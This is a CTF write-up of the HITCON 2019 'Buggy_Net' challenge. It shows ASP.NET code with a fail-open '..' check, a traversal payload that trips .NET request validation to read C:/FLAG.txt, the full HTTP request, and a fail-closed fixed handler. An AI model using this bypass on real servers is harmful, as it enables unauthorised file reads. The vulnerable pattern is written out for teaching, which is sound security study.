[HITCON 2019] Buggy_Net: .NET 4.0 form handling

0x01 Source

bool isBad = false;
try {
    if ( Request.Form["filename"] != null ) {
        isBad = Request.Form["filename"].Contains("..") == true;
    }
} catch (Exception ex) {
    
} 

try {
    if (!isBad) {
        Response.Write(System.IO.File.ReadAllText(@"C:\inetpub\wwwroot\" + Request.Form["filename"]));
    }
} catch (Exception ex) {

}

From the HTTP response headers we can tell this is .NET 4.0:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
[...]

Looking at this short piece of code: the challenge hints that the flag is at c:/FLAG.txt, so we have to traverse out of the web root, but the filename check on ".." blocks that. We can craft a request that makes the first try block throw, so isBad stays at its default of false, while the second try block does not throw and the file is read successfully.

payload:

filename=../../FLAG.txt&qwqeqwe=<!

Note that the challenge form uses POST, but here we can only use GET (the body is still sent):

GET / HTTP/1.1
Host: node3.buuoj.cn:29225
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://node3.buuoj.cn:29225/
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://node3.buuoj.cn:29225
Connection: close
Cookie: _ga=GA1.2.1327658694.1580490668
Upgrade-Insecure-Requests: 1

filename=../../FLAG.txt&qwqeqwe=<!

What is exploited here is .NET's request validation of the form parameters, which is used to make the request throw an exception at the right point.
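The root cause is a check that fails open: the validation result lives in a variable whose default is "not bad", and every exception is swallowed. As an added example (not the challenge's code, written here for comparison), the handler below assumes the same ASP.NET Web Forms context and the same web root, canonicalises the path before checking containment, rejects anything that is not a plain file name, and treats every exception as a denial. The `SafeFileRead` class and its method names are assumptions for this example.

```csharp
// Added example (not the challenge's code): a fail-closed version of the handler.
// Assumptions: same ASP.NET Web Forms page context (HttpRequest/HttpResponse) and
// the same web root C:\inetpub\wwwroot\ as in the original snippet.
using System;
using System.IO;
using System.Web;

public static class SafeFileRead
{
    private const string WebRoot = @"C:\inetpub\wwwroot\";

    // Returns the canonical path if 'filename' resolves to a file directly under
    // WebRoot, otherwise null. The containment check is done on the canonical path
    // (Path.GetFullPath collapses ".."), so it does not depend on a substring test.
    public static string ResolveUnderWebRoot(string filename)
    {
        if (string.IsNullOrEmpty(filename)) return null;

        // Only plain file names are accepted: '\\', '/', ':' and other invalid
        // file-name characters are rejected, as are rooted paths.
        if (filename.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0) return null;
        if (Path.IsPathRooted(filename)) return null;

        string root = Path.GetFullPath(WebRoot);
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString()))
            root += Path.DirectorySeparatorChar;

        string full = Path.GetFullPath(Path.Combine(root, filename));

        // Trailing separator on 'root' prevents "C:\inetpub\wwwroot2\x" from
        // passing as a prefix match.
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase)) return null;
        return full;
    }

    public static void Handle(HttpRequest request, HttpResponse response)
    {
        string target;
        try
        {
            // Fail closed: if reading the form throws (request validation included),
            // the result is "denied", not the original code's default of "not bad".
            target = ResolveUnderWebRoot(request.Form["filename"]);
        }
        catch (Exception)
        {
            target = null;
        }

        if (target == null)
        {
            response.StatusCode = 400;
            return;
        }

        try
        {
            response.Write(File.ReadAllText(target));
        }
        catch (IOException)
        {
            // Missing or unreadable file: report it instead of silently returning 200.
            response.StatusCode = 404;
        }
    }
}
```

Two design points matter here. First, the decision variable is computed inside the guarded region and defaults to "deny", so making an earlier statement throw cannot flip the outcome. Second, ASP.NET request validation (what the `<!` in the extra parameter triggers) is an XSS mitigation for rendered output, not a path check; the handler above does its own validation and does not rely on it.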



Reposted from blog.csdn.net/a3320315/article/details/104218069